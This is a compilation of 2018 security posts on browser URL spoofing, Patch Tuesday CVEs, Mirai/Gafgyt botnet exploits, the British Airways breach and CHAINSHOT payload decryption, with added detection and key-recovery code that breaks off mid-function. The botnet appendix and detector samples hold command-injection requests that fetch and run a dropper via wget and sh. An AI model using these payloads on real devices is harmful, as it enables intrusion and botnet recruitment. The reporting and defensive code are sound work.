Beware! Unpatched Safari Browser Hack Lets Attackers Spoof URLs

A security researcher has discovered a serious vulnerability that could allow attackers to spoof website addresses in the Microsoft Edge web browser for Windows and Apple Safari for iOS.

While Microsoft fixed the address bar URL spoofing vulnerability last month as part of its monthly security updates, Safari is still unpatched, potentially leaving Apple users vulnerable to phishing attacks.

Phishing attacks today are sophisticated and increasingly difficult to spot, and this newly discovered vulnerability takes them to another level: it can defeat basic indicators such as the URL and the SSL indicator, which are the first things a user checks to determine whether a website is fake.

Discovered by Pakistan-based security researcher Rafay Baloch, the vulnerability (CVE-2018-8383) is due to a race condition type issue caused by the web browser allowing JavaScript to update the page address in the URL bar while the page is loading.

Here’s How the URL Spoofing Vulnerability Works

Successful exploitation of the flaw could potentially allow an attacker to initially start loading a legitimate page, which would cause the page address to be displayed in the URL bar, and then quickly replace the code in the web page with a malicious one.

“Upon requesting data from a non-existent port the address was preserved and hence a race condition over a resource requested from a non-existent port, combined with the delay induced by the setInterval function, managed to trigger address bar spoofing,” Baloch explains on his blog.

“It causes the browser to preserve the address bar and to load the content from the spoofed page. The browser will however eventually load the resource, however the delay induced with setInterval function would be enough to trigger the address bar spoofing.”

Since the URL displayed in the address bar does not change, the phishing attack would be difficult for even a trained user to detect.

Using this vulnerability, an attacker can impersonate any web page, including Gmail, Facebook, Twitter, or even bank websites, and create fake login screens or other forms to steal credentials and other data from users, who see the legitimate domain in the address bar.

Baloch created a proof-of-concept (PoC) page to test the vulnerability, and observed that both Microsoft Edge and Apple Safari browsers “allowed javascript to update the address bar while the page was still loading.”

Proof-of-Concept Video Demonstrations

The researcher has also published proof of concept videos for both Edge and Safari:


According to Baloch, neither Google Chrome nor Mozilla Firefox is affected by this vulnerability.

While Microsoft had already patched the issue last month with its Patch Tuesday updates for August 2018, Baloch has yet to get a response from Apple about the flaw he reported to the company back on June 2.

The researcher disclosed the full technical details of the vulnerability and proof-of-concept (PoC) code for Edge only after the 90-day disclosure window, but he is holding the proof-of-concept code for Safari until Apple patches the issue in the upcoming version of Safari.


Microsoft Patch Tuesday – September 2018

Microsoft released its monthly set of security updates today, addressing bugs across a variety of its products. The latest Patch Tuesday covers 61 vulnerabilities, 17 of which are rated “critical,” 43 that are rated “important” and one that is considered to have “moderate” severity.

The advisories cover bugs in the Internet Explorer web browser, Jet Database Engine and the Chakra scripting engine, among other products and software.

This update also includes two critical advisories, one of which covers security updates to Adobe Flash, and another that deals with a denial-of-service vulnerability in the Microsoft Windows operating system.


Microsoft released coverage for 17 critical bugs. Cisco Talos believes 16 of these are of special importance and need to be addressed by users immediately.

CVE-2018-0965 is a remote code execution vulnerability in the Windows Hyper-V hypervisor. An attacker can exploit this vulnerability by running a specially crafted application on a guest system that would cause the system operating Hyper-V to execute arbitrary code. The flaw lies in the way that Hyper-V validates inputs from an authenticated user on a guest OS.

CVE-2018-8367 is a remote code execution vulnerability in the Chakra scripting engine. The engine improperly handles objects in memory in the Microsoft Edge web browser that could allow an attacker to corrupt the system’s memory and execute arbitrary code with the user’s credentials.

CVE-2018-8420 is a remote code execution vulnerability in Microsoft XML Core Services MSXML. An attacker could trick the user into visiting a specially crafted, malicious website designed to invoke MSXML through a web browser, allowing the attacker to eventually run code and take control of the user’s system.

CVE-2018-8461 is a remote code execution vulnerability in Internet Explorer that exists when the web browser improperly accesses objects in memory. This bug could corrupt memory in a way that an attacker could execute arbitrary code with the same rights as the current user. A user would need to visit a specially crafted, malicious website to trigger this vulnerability.

CVE-2018-8475 is a remote code execution vulnerability in Windows OS, which exists due to the image-loading functionality improperly handling malformed image files. An attacker could exploit this bug by convincing a user to load a malformed image file from either a web page, email or other method.

CVE-2018-8332 is a remote code execution vulnerability in the Windows font library. There are multiple ways in which an attacker could exploit this flaw, including convincing the user to click on a malicious web page or providing the user with a specially crafted, malicious document.

CVE-2018-8391 is a remote code execution vulnerability in the Chakra scripting engine. An attacker can exploit this flaw if a user is logged on with an administrative account.

CVE-2018-8439 is a remote code execution vulnerability in the Windows Hyper-V hypervisor. The bug exists in Hyper-V’s validation on a host server. An attacker can exploit this flaw by running a specially crafted application on a guest operating system that could lead to the machine running Hyper-V executing arbitrary code.

CVE-2018-8447 is a remote code execution vulnerability in Internet Explorer. An attacker could exploit this vulnerability by tricking a user into visiting a specially crafted web page while using the Internet Explorer browser, or by taking advantage of a compromised website through advertisements or attachments that the user would have to click on.

CVE-2018-8456 and CVE-2018-8459 are remote code execution vulnerabilities that exist in the Chakra scripting engine’s handling of objects in memory. This bug could corrupt memory in a way that an attacker could execute arbitrary code with the same rights as the current user.

CVE-2018-8457 is a remote code execution vulnerability that exists in the way Microsoft web browsers’ scripting engines handle objects in memory. An attacker could host a specially crafted website to exploit this vulnerability, and then convince the user to visit the website while using a Microsoft web browser, or they could embed an ActiveX control that is marked “safe for initialization” in a Microsoft Office file or an application that hosts the browser’s rendering engine.

CVE-2018-8464 is a remote code execution vulnerability in Microsoft Edge’s PDF reader that exists in the way the reader handles objects in memory. An attacker could exploit this bug by convincing a user to click on a web page that contains a malicious PDF, or by hosting the PDF on websites that host user-provided content.

CVE-2018-8465, CVE-2018-8466 and CVE-2018-8467 are remote code execution vulnerabilities in the Chakra scripting engine that lie in the way it handles objects in memory in the Microsoft Edge web browser. An attacker can exploit these bugs by tricking the user into opening a malicious web page, or an advertisement that is hosted on a website that allows user-provided content.

The other critical vulnerability is:


There is also coverage for 43 important vulnerabilities, 11 of which we wish to highlight.

CVE-2018-8354 is a remote code execution vulnerability that exists in the way the scripting engine handles objects in memory in the Microsoft Edge web browser. A user would need to visit a specially crafted, malicious website in order to trigger this vulnerability.

CVE-2018-8392 and CVE-2018-8393 are buffer overflow vulnerabilities in the Microsoft Jet Database Engine. To exploit these bugs, a user must open a specially crafted Excel file while using an at-risk version of Windows. An attacker could exploit these vulnerabilities to execute code on the victim’s machine at an administrator’s level.

CVE-2018-8430 is a remote code execution vulnerability in Microsoft Word 2013 and 2016. An attacker can exploit this by tricking a user into opening a specially crafted, malicious PDF.

CVE-2018-8447 is an elevation of privilege vulnerability that lies in the way Windows processes calls to Advanced Local Procedure Call (ALPC). An attacker would need to log onto the system directly in order to exploit this vulnerability, and then run a specially crafted application.

CVE-2018-8331 is a remote code execution vulnerability in Microsoft Excel that exists when the software fails to correctly handle objects in memory. A user could trigger this bug by opening a specially crafted, malicious file in an email or on a web page.

CVE-2018-8315 is an information disclosure vulnerability in Microsoft’s scripting engine that could expose uninitialized memory if exploited. An attacker could access this information by convincing a user to visit a malicious website and then leveraging the vulnerability to obtain privileged data from the browser process.

CVE-2018-8335 is a denial-of-service vulnerability in Microsoft Server Message Block (SMB). An attacker can send a specially crafted request to the server to trigger this vulnerability.

CVE-2018-8425 is a spoofing vulnerability in the Microsoft Edge web browser. The bug lies in the way the browser handles specific HTML content. If an attacker correctly exploits this bug, a user could be tricked into thinking they are visiting a legitimate website when they are actually on a malicious page.

CVE-2018-8440 is an elevation of privilege vulnerability that occurs when Windows incorrectly handles calls to Advanced Local Procedure Call (ALPC). An attacker needs to log onto the system directly to exploit this vulnerability, and then run a specially crafted application to take over the system. This vulnerability has been spotted in the wild as part of several pieces of malware.

The other vulnerabilities that are rated “important” are:

Author: Talos Group

Multi-exploit IoT/Linux Botnets Mirai and Gafgyt Target Apache Struts, SonicWall

Executive Summary:

Unit 42 has uncovered new variants of the well-known IoT botnets Mirai and Gafgyt. These are the IoT botnets associated with unprecedented Distributed Denial of Service attacks in November 2016 and since.

These variants are notable for two reasons:

  • The new Mirai version targets the same Apache Struts vulnerability associated with the Equifax data breach in 2017.
  • The new Gafgyt version targets a newly disclosed vulnerability affecting older, unsupported versions of SonicWall’s Global Management System (GMS).

These developments suggest these IoT botnets are increasingly targeting enterprise devices running outdated software versions.

All organizations should ensure they keep not only their systems but also their IoT devices up-to-date and patched. For Palo Alto Networks customers, WildFire detects all related samples with malicious verdicts. Additional protections are noted in the conclusion below.


On September 7, 2018, Unit 42 found samples of a Mirai variant that incorporates exploits targeting 16 separate vulnerabilities. While the use of multiple exploits within a single sample of Mirai has been observed in the past, this is the first known instance of Mirai targeting a vulnerability in Apache Struts.

In addition, Unit 42 found that the domain currently hosting these Mirai samples previously resolved to a different IP address during the month of August. During that time this IP was intermittently hosting samples of Gafgyt that incorporated an exploit against CVE-2018-9866, a SonicWall vulnerability affecting older versions of SonicWall Global Management System (GMS). SonicWall has been notified of this development.

The incorporation of exploits targeting Apache Struts and SonicWall by these IoT/Linux botnets could indicate a larger movement from consumer device targets to enterprise targets.

Apache Struts exploit in multi-exploit Mirai variant

The exploit targeting Apache Struts in the new variant we found targets CVE-2017-5638, an arbitrary command execution vulnerability via crafted Content-Type, Content-Disposition, or Content-Length HTTP headers. Its format can be seen in Figure 1, with the payload highlighted.


Figure 1 CVE-2017-5638 exploit format

The other 15 exploits incorporated in this Mirai variant are detailed in Table 2 in the Appendix below.

While these samples are variants of Mirai, they don’t include the brute-force functionality generally used by Mirai. They use l[.]ocalhost[.]host:47883 as C2, and the same encryption scheme as Mirai with the key 0xdeadf00d.

SonicWall GMS exploit in Gafgyt variant

The domain l[.]ocalhost[.]host, used for C2 and to serve payloads in the Mirai variant discussed above, has also been found associated with other Mirai activity in the past, as far back as November 2016.

For part of the month of August 2018, that same domain resolved to a different IP address 185[.]10[.]68[.]127. At that time we found that IP hosting samples of Gafgyt containing an exploit for a recently disclosed SonicWall vulnerability (CVE-2018-9866) affecting older, unsupported versions of SonicWall Global Management System (GMS) (8.1 and older) that is not present in currently supported versions.

The vulnerability CVE-2018-9866 targeted by the exploit stems from the lack of sanitization of XML-RPC requests to the set_time_config method. Figure 2 shows the exploit used in the sample, with the payload highlighted.


Figure 2 SonicWall set_time_config RCE format

These samples first surfaced on August 5, less than a week after the publication of a Metasploit module for this vulnerability. The SonicWall public advisory on the issue published on July 17, 2018, can be found here.
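The exploit shapes named in this post and in its appendix share a few header and parameter features a defender can match on in web-server or proxy logs: an OGNL expression (`%{`) in the Content-Type, Content-Disposition or Content-Length header for CVE-2017-5638, an XML-RPC call to the set_time_config method for CVE-2018-9866, a SOAPAction value for HNAP1/GetDeviceSettings carrying shell metacharacters, and the download-and-run pattern (`wget ...;sh /tmp/...`) inside backticks or $( ). The Python below is an added example written for this page, not code from Unit 42: the sample requests, hosts, credentials and file names are constructed, the /xmlrpc path used for the GMS request is an assumption, and the rule labels are my own.

```python
import re
from urllib.parse import unquote

# Constructed sample requests (not captures from the report). Exploit strings
# are reduced to the header/parameter shapes the report names.
SAMPLES = {
    "struts": (
        "POST /struts2-showcase/index.action HTTP/1.1\n"
        "Host: 192.0.2.10\n"
        "Content-Type: %{(#_='multipart/form-data').(#placeholder=1)}\n"
        "Content-Length: 0\n\n"
    ),
    "linksys": (
        "POST /tmBlock.cgi HTTP/1.1\n"
        "Host: 192.0.2.11\n"
        "Authorization: Basic YWRtaW46cGFzc3dvcmQ=\n"
        "Content-Type: application/x-www-form-urlencoded\n"
        "Content-Length: 120\n\n"
        "submit_button=&ttcp_num=2&ttcp_size=2&ttcp_ip=-h%20"
        "`wget%20http://198.51.100.7/nemp;sh%20/tmp/nemp`&StartEPI=1"
    ),
    "sonicwall": (
        "POST /xmlrpc HTTP/1.1\n"          # path is an assumption
        "Host: 192.0.2.12\n"
        "Content-Type: text/xml\n\n"
        "<?xml version=\"1.0\"?><methodCall><methodName>set_time_config</methodName>"
        "<params><param><value><string>placeholder</string></value></param></params></methodCall>"
    ),
    "hnap": (
        "POST /HNAP1/ HTTP/1.1\n"
        "Host: 192.0.2.13\n"
        "SOAPAction: \"http://purenetworks.com/HNAP1/GetDeviceSettings/"
        "`wget http://198.51.100.7/nemp;sh /tmp/nemp`\"\n\n"
        "<soap:Envelope/>"
    ),
    "benign": "GET /index.html HTTP/1.1\nHost: 192.0.2.14\nAccept: text/html\n\n",
}

# Headers CVE-2017-5638 is triggered through; an OGNL expression starts with "%{".
OGNL_HEADERS = ("content-type", "content-disposition", "content-length")
SET_TIME_CONFIG = re.compile(r"<methodName>\s*set_time_config\s*</methodName>")
# "`wget ... ;sh /tmp/x`" or "$(wget ... ;sh /tmp/x)": fetch a dropper and run it.
DROPPER = re.compile(r"(?:`|\$\()\s*(?:wget|curl|tftp)\b.*?;\s*(?:sh|busybox)\s+/tmp/\S+", re.S)
HNAP_SETTINGS = "HNAP1/GetDeviceSettings"


def parse_request(raw):
    """Split a raw HTTP request into method, path, lower-cased headers and body."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    lines = head.split("\n")
    parts = lines[0].split()
    method = parts[0]
    path = parts[1] if len(parts) > 1 else ""
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "headers": headers, "body": body}


def classify(req):
    """Return the list of exploit-pattern labels matching one parsed request."""
    hits = []
    headers = req["headers"]
    if any("%{" in headers.get(h, "") for h in OGNL_HEADERS):
        hits.append("struts-ognl-header (CVE-2017-5638)")
    if SET_TIME_CONFIG.search(req["body"]):
        hits.append("sonicwall-gms-set_time_config (CVE-2018-9866)")
    soap = headers.get("soapaction", "")
    if HNAP_SETTINGS in soap and re.search(r"[`;|]|\$\(", soap):
        hits.append("hnap-soapaction-injection")
    # URL-decode path and body; header values are checked as-is.
    surface = "\n".join([unquote(req["path"]), unquote(req["body"]), *headers.values()])
    if DROPPER.search(surface):
        hits.append("shell-dropper-command-injection")
    return hits


def scan(samples=SAMPLES):
    return {name: classify(parse_request(raw)) for name, raw in samples.items()}
```

The HNAP sample matches twice on purpose: the SOAPAction rule catches the vector, the dropper rule catches the payload, and either alone is a strong signal. Percent-decoding before matching matters because the Linksys and AVTECH forms in the appendix arrive URL-encoded.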

The samples we found are built using the Gafgyt codebase rather than Mirai. Some of the commands supported are described in the table below.

Command: !* SCANNER <HUAWEI/GPON/DLINK/SONICWALL/OFF>
Description: Based on the argument provided, the bot starts sending the associated exploit to devices.
  • HUAWEI: send CVE-2017-17215 (see previous campaigns)
  • GPON: same as above
  • DLINK: send D-Link DSL 2750B OS Command Injection (see Table 1)
  • SONICWALL: send the exploit in Figure X
  • OFF: kills a running process associated with the bot

Command: !* BIN_UPDATE
Description: Fetches an update from , saves it to , installs update

Command: !* BN
Description: Launch a Blacknurse DDoS attack against : for a duration of

Table 3 Some commands supported by variant with SonicWall exploit

Blacknurse is a low-bandwidth DDoS attack, first described in November 2016, in which ICMP Type 3 Code 3 (destination unreachable, port unreachable) packets cause high CPU load on the target. The earliest samples we have seen supporting this DDoS method are from September 2017.
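Because Blacknurse relies on the volume of one specific ICMP type/code rather than on any malformed packet, the natural detection is a per-source rate check on exactly that type and code. The Python below is an added example, not part of the Unit 42 post: it runs a sliding-window count of ICMP type 3 code 3 packets over a constructed packet list; the 1000 packets-per-second threshold and the addresses are assumptions for illustration and should be tuned to the measured capacity of the firewall being protected.

```python
from collections import deque

ICMP_DEST_UNREACH = 3   # ICMP type 3
ICMP_PORT_UNREACH = 3   # ICMP code 3
PPS_THRESHOLD = 1000    # assumption for illustration; tune per device
WINDOW_SECONDS = 1.0


def blacknurse_alerts(packets, threshold=PPS_THRESHOLD, window=WINDOW_SECONDS):
    """packets: iterable of (timestamp, icmp_type, icmp_code, src_ip).

    Returns one alert per source as (src_ip, window_start, count) the first
    time that source sends `threshold` or more type 3/code 3 packets within
    `window` seconds. Other ICMP traffic is ignored entirely."""
    per_src = {}
    alerted = set()
    alerts = []
    for ts, itype, icode, src in sorted(packets):
        if itype != ICMP_DEST_UNREACH or icode != ICMP_PORT_UNREACH:
            continue
        recent = per_src.setdefault(src, deque())
        recent.append(ts)
        while recent and ts - recent[0] > window:   # drop timestamps that fell out of the window
            recent.popleft()
        if len(recent) >= threshold and src not in alerted:
            alerts.append((src, recent[0], len(recent)))
            alerted.add(src)
    return alerts


def constructed_capture():
    """Constructed sample: one flooding source plus low-rate background ICMP."""
    pkts = []
    for i in range(1500):                                   # 1500 port-unreachables in 0.45 s
        pkts.append((100.0 + i * 0.0003, 3, 3, "203.0.113.5"))
    for i in range(50):                                     # legitimate trickle from elsewhere
        pkts.append((100.0 + i * 0.02, 3, 3, "198.51.100.20"))
        pkts.append((100.0 + i * 0.02, 0, 0, "198.51.100.21"))  # echo replies, ignored
    return pkts
```

Spoofed-source floods would slip past a purely per-source counter, so in production the same window count should also be kept globally per ingress interface; the mitigation the original Blacknurse advisory recommended, rate-limiting or dropping inbound ICMP type 3 code 3 at the edge, does not depend on attribution at all.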


The incorporation of exploits targeting Apache Struts and SonicWall by these IoT/Linux botnets could be an indication of a larger movement from consumer device targets to enterprise targets.

Palo Alto Networks AutoFocus customers can track these activities using individual exploit tags:

AutoFocus customers can also use the following malware family tags:

WildFire detects all related samples with malicious verdicts.

Here is a list of other vulnerabilities targeted in the Mirai variant targeting Apache Struts:

Vulnerability: CVE-2017-5638
Affected devices: Devices with unpatched Apache Struts

Vulnerability: Linksys RCE
Affected devices: Linksys E-series devices
Exploit format:
POST /tmBlock.cgi HTTP/1.1
Authorization: Basic YWRtaW46cG9ybmh1Yg==
Content-Type: application/x-www-form-urlencoded
Content-Length: 215

submit_button=&change_action=&action=&commit=0&ttcp_num=2&ttcp_size=2&ttcp_ip=-h `wget%20;sh%20/tmp/nemp`&StartEPI=1

The samples contain other versions of the same exploit using GET and POST requests, aimed at /tmBlock.cgi, /tmUnblock.cgi, /hndBlock.cgi and /hndUnblock.cgi.

Vulnerability: Vacron NVR RCE
Affected devices: Vacron NVR devices
Exploit format: Similar to previous campaigns. This variant also contains a POST request version of the same exploit:
POST /board.cgi HTTP/1.1
Content-Length: 118
Content-Type: application/x-www-form-urlencoded

Vulnerability: D-Link command.php RCE
Affected devices: Some D-Link devices
Exploit format:
POST /command.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 127

Vulnerability: CCTV/DVR RCE
Affected devices: CCTVs, DVRs from over 70 vendors
Exploit format: Similar to previous campaigns

Vulnerability: EnGenius RCE
Affected devices: EnGenius EnShare IoT Gigabit Cloud Service 1.4.11
Exploit format:
POST /web/cgi-bin/usbinteract.cgi HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 133

Vulnerability: AVTECH Unauthenticated Command Injection
Affected devices: AVTECH IP Camera/NVR/DVR devices
Exploit format:
GET /cgi-bin/nobody/Search.cgi?action=cgi_query&;XmlAp%20r%20Account.User1.Password>$(wget%20;sh%20/tmp/nemp);&password=admin
Content-Type: application/x-www-form-urlencoded

Vulnerability: CVE-2017-6884
Affected devices: Zyxel routers
Exploit format:
GET /cgi-bin/luci/;stok=/expert/maintenance/diagnostic/nslookup?nslookup_button=nslookup_button&`wget%20;sh%20/tmp/nemp`&server_ip= HTTP/1.1
Accept: text/html,application/xhtml777ml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.8
Cookie: csd=9; sysauth=
Connection: close

Vulnerability: NetGain ‘ping’ Command Injection
Affected devices: NetGain Enterprise Manager 7.2.562
Exploit format:
POST /u/jsp/tools/exec.jsp HTTP/1.1
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Cookie: JSESSIONID=542B58462355E4E3B99FAA42842E62FF
Connection: close
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 206

Vulnerability: NUUO OS Command Injection
Affected devices: NUUO NVRmini 2 3.0.8
Exploit format:
POST /handle_iscsi.php HTTP/1.1
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: PHPSESSID=c9fdced9e8129eb4c14e3154cd0e0ce3; lang=en; loginName=admin
Connection: close
Content-Length: x

Vulnerability: NUUO OS Command Injection
Affected devices: NUUO NVRmini 2 3.0.8
Exploit format:
POST /cgi-bin/cgi_system?cmd=saveconfig HTTP/1.1
Cache-Control: max-age=0
Content-Length: 187
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml777ml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.8
Cookie: PHPSESSID=3bc601000ea8f085c22cb37b9b102b7f; lang=en
Connection: close

Vulnerability: Netgear setup.cgi unauthenticated RCE
Affected devices: DGN1000 Netgear routers
Exploit format: Similar to previous campaigns

Vulnerability: HNAP SoapAction-Header Command Execution
Affected devices: D-Link devices
Exploit format: Similar to previous campaigns. This variant uses a working version of the exploit, as opposed to the faulty one used in the campaigns linked above, i.e. it targets SOAPAction: http://purenetworks[.]com/HNAP1/GetDeviceSettings/

Vulnerability: D-Link OS Command Injection
Affected devices: D-Link DSL-2750B
Exploit format: Similar to previous campaigns

Vulnerability: JAWS Webserver authenticated shell command execution
Affected devices: MVPower DVRs, among others
Exploit format: Similar to previous campaigns

Vulnerability: CVE-2018-10561, CVE-2018-10562
Affected devices: Dasan GPON routers
Exploit format: Similar to previous campaigns. This variant also includes a POST request version of the same exploit.

Table 2 Other exploits used in the same sample

Indicators of Compromise

Samples with Apache Struts exploit CVE-2017-5638

Samples with Sonicwall GMS exploit CVE-2018-9866

The post Multi-exploit IoT/Linux Botnets Mirai and Gafgyt Target Apache Struts, SonicWall appeared first on Palo Alto Networks Blog.

Author: Ruchna Nigam

British Airways Hacked – 380,000 Payment Cards Compromised

British Airways, which describes itself as “The World’s Favorite Airline,” has confirmed a data breach that exposed personal details and credit-card numbers of up to 380,000 customers and lasted for more than two weeks.

So who exactly are victims?

According to a statement released by British Airways on Thursday, customers booking flights on its website and British Airways mobile app between late 21 August and 5 September were compromised.

The airline advised customers who made bookings during that 15-day period and believe they may have been affected by this incident to “contact their banks or credit card providers and follow their recommended advice.”

British Airways stated on its Twitter account that personal details stolen in the breach included their customers’ names and addresses, along with their financial information, but the company assured its customers that the hackers did not get away with their passport numbers or travel details.

The company also said that cards saved on its website and mobile app were not compromised in the breach. Only cards used to make booking payments during the affected period were stolen.

“We are investigating, as a matter of urgency, the theft of customer data from our website and our mobile app,” the company said in a statement. “The stolen data did not include travel or passport details.”

Although the statement released by the airline did not mention the number of affected customers, the company’s spokesperson confirmed to the media that some 380,000 payment cards were compromised in the breach.

It is also not yet clear how the data breach occurred, but some media outlets are reporting that the breach was identified when “a third party noticed some unusual activity” and informed the company about it.

A spokesperson from British Airways confirmed to The Hacker News that “this is data theft, rather than a breach,” which suggests someone with privileged access to the data might have stolen it.

British Airways has also informed the police and the Information Commissioner and is currently reaching out to affected customers directly.

However, the company assured its customers that the security breach has now been resolved, and that its website is working normally and is now safe for passengers to check in and book flights online.

The National Crime Agency is aware of the British Airways data breach and is “working with partners to assess the best course of action.”

Air Canada also suffered a severe data breach late last month, which, along with personal data, also exposed passport numbers and other passport and travel details of about 20,000 mobile app customers.


Slicing and Dicing CVE-2018-5002 Payloads: New CHAINSHOT Malware

This story begins with one of our blog authors, who, following the discovery of a new Adobe Flash 0-day, found several documents using the same exploit that were used in targeted attacks. We were also able to collect network captures including the encrypted malware payload. Armed with these initial weaponized documents, we uncovered additional attacker network infrastructure, were able to crack the 512-bit RSA keys, and decrypt the exploit and malware payloads. We have dubbed the malware ‘CHAINSHOT’, because it is a targeted attack with several stages and every stage depends on the input of the previous one.

This blog describes the process we took to analyze the malware, how we managed to decrypt the payloads, and then how we found parts of a new attack framework. We also found additional network infrastructure which indicates similar attacks were conducted against a wide range of targets with disparate interests. This attack chain is designed in a way that makes it very difficult to execute a single part on its own, be it the exploit or the payload. To make our analysis easier, we reproduced the server-side infrastructure; by doing so we were able to conduct dynamic analysis and get a better understanding of how the exploit and payload work together.

This serves as a follow-up to Icebrg’s article, which describes the initial findings.

Cracking an RSA Key

First, let’s recap how the overall attack chain works to understand at which point the RSA key is needed. The malicious Microsoft Excel document contains a tiny Shockwave Flash ActiveX object with the following properties:


Figure 1. Malicious Shockwave Flash ActiveX object properties

The “Movie” property contains a URL to a Flash application which is downloaded in cleartext and then executed. The “FlashVars” property contains a long string with 4 URLs which are passed to the downloaded Flash application. The Flash application is an obfuscated downloader which creates a random 512-bit RSA key pair in the memory of the process. While the private key remains only in memory, the public key’s modulus n is sent to the attacker’s server. On the server side, the modulus is used together with the hardcoded exponent e = 0x10001 to encrypt the 128-bit AES key which was used previously to encrypt the exploit and shellcode payload. The encrypted exploit or payload is sent back to the downloader, which uses the in-memory private key to decrypt the AES key and then the exploit or payload.

As the modulus is sent to the attacker’s server, it’s also in our network capture. Together with the hardcoded exponent we have the public key, which we can use to recover the private key. Keep in mind that this was only possible because the attacker chose a key length of 512 bits, which is known to be insecure. To recover the private key, we have to factorize the modulus n into its two prime factors p and q. Luckily this problem has already been solved by an excellent public project, ‘Factoring as a Service’. The project uses Amazon EC2’s high computing power and can factorize large integers in just a matter of hours.

Following this logic, let’s take the following modulus of the public key sent to the attacker’s server to get the shellcode payload.


Figure 2. HTTP POST request for the encrypted shellcode payload with the modulus n in hexadecimal

After removing the first 2 bytes which are used in this case to retrieve the 32-bit version of the shellcode payload, we have the following modulus in hexadecimal:


After we have factorized the integer, we get the following two prime numbers in decimal:





With the help of p and q we can calculate the private key. We used a small public tool to create it in Privacy Enhanced Mail (PEM) format:


With the help of the private key we could now decrypt the 128-bit AES key. We used OpenSSL to do this:

openssl rsautl -decrypt -in enc_aes.bin -out dec_aes.bin -inkey private_key.pem

The encrypted AES key is extracted from the encrypted binary blob as described by Icebrg. It’s at offset 0x4 and has the length of 0x40 bytes. Encrypted AES key:


Decrypted AES key:


Now that we have the decrypted AES key, we can decrypt the actual payload. The Flash downloader uses a custom initialization vector (IV) for the AES algorithm which can be found at offset 0x44 in the encrypted blob and is 16 bytes long:


For the final decryption we used OpenSSL again:

openssl enc -nosalt -aes-128-cbc -d -in payload.bin -out decrypted_payload -K E4DF3353FD6D213E7400EEDA8B164FC0 -iv CC6FC77B877584121AEBCBFD4C23B67C

The decrypted shellcode payload is additionally compressed with zlib which can be seen by looking at the first 2 magic bytes 0x789C. We decompressed it with Offzip. Finally, we have the decrypted shellcode payload. The same procedure can be used to decrypt the Flash exploit which isn’t additionally zlib compressed.
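The steps above (factor n into p and q, derive the private key, RSA-unwrap the 64-byte encrypted AES key at offset 0x4, read the 16-byte IV at offset 0x44, then decrypt with AES-128-CBC) can be checked end to end on a constructed blob. The Python below is an added example, not code from the authors or from the tools they used: it generates its own throwaway 512-bit key pair (the factoring step is replaced by simply knowing p and q), wraps the AES key printed in the article with the PKCS#1 v1.5 padding that `openssl rsautl -decrypt` expects by default, parses the blob layout the article describes, and recovers the key from p and q. The header bytes before offset 0x4 are set to zero here as an assumption, and the AES-CBC and zlib steps themselves are left to the OpenSSL and Offzip commands above.

```python
import random

E = 0x10001                                                   # exponent hardcoded in the downloader
AES_KEY = bytes.fromhex("E4DF3353FD6D213E7400EEDA8B164FC0")   # decrypted AES key from the article
IV = bytes.fromhex("CC6FC77B877584121AEBCBFD4C23B67C")        # custom IV from the article

# Blob layout as described in the article
KEY_OFF, KEY_LEN = 0x4, 0x40      # RSA-encrypted AES key: 64 bytes for a 512-bit modulus
IV_OFF, IV_LEN = 0x44, 0x10       # 16-byte AES-CBC IV


def is_probable_prime(n, rng, rounds=32):
    """Miller-Rabin, sufficient for a throwaway demo key pair."""
    if n < 2:
        return False
    for sp in (2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37):
        if n % sp == 0:
            return n == sp
    d, r = n - 1, 0
    while d % 2 == 0:
        d //= 2
        r += 1
    for _ in range(rounds):
        x = pow(rng.randrange(2, n - 1), d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False
    return True


def gen_prime(bits, rng):
    while True:
        cand = rng.getrandbits(bits) | (1 << (bits - 1)) | 1   # force exact bit length, odd
        if is_probable_prime(cand, rng):
            return cand


def private_exponent(p, q, e=E):
    """d from the factors of n: this is what factoring the captured modulus buys the analyst."""
    return pow(e, -1, (p - 1) * (q - 1))


def pkcs1_v15_wrap(msg, k, rng):
    """EME-PKCS1-v1_5: 00 02 <nonzero random padding> 00 <msg>, k = modulus length in bytes."""
    ps = bytes(rng.randrange(1, 256) for _ in range(k - 3 - len(msg)))
    return b"\x00\x02" + ps + b"\x00" + msg


def pkcs1_v15_unwrap(em):
    if em[:2] != b"\x00\x02":
        raise ValueError("bad PKCS#1 v1.5 header")
    sep = em.index(b"\x00", 2)
    if sep < 10:
        raise ValueError("padding string shorter than 8 bytes")
    return em[sep + 1:]


def rsa_wrap_key(aes_key, n, e, rng):
    """Server side: encrypt the AES key under the downloader's public key (n, e)."""
    k = (n.bit_length() + 7) // 8
    m = int.from_bytes(pkcs1_v15_wrap(aes_key, k, rng), "big")
    return pow(m, e, n).to_bytes(k, "big")


def rsa_unwrap_key(enc_key, d, n):
    """Analyst side: the same operation `openssl rsautl -decrypt` performs."""
    k = (n.bit_length() + 7) // 8
    em = pow(int.from_bytes(enc_key, "big"), d, n).to_bytes(k, "big")
    return pkcs1_v15_unwrap(em)


def build_blob(enc_key, iv, ciphertext):
    """Constructed blob following the described offsets; the 4 header bytes are assumed zero."""
    assert len(enc_key) == KEY_LEN and len(iv) == IV_LEN
    return bytes(KEY_OFF) + enc_key + iv + ciphertext


def parse_blob(blob):
    enc_key = blob[KEY_OFF:KEY_OFF + KEY_LEN]
    iv = blob[IV_OFF:IV_OFF + IV_LEN]
    return enc_key, iv, blob[IV_OFF + IV_LEN:]


def recover_aes_key(blob, p, q, e=E):
    """Given the factors of the captured modulus, pull AES key, IV and ciphertext out of the blob."""
    enc_key, iv, ciphertext = parse_blob(blob)
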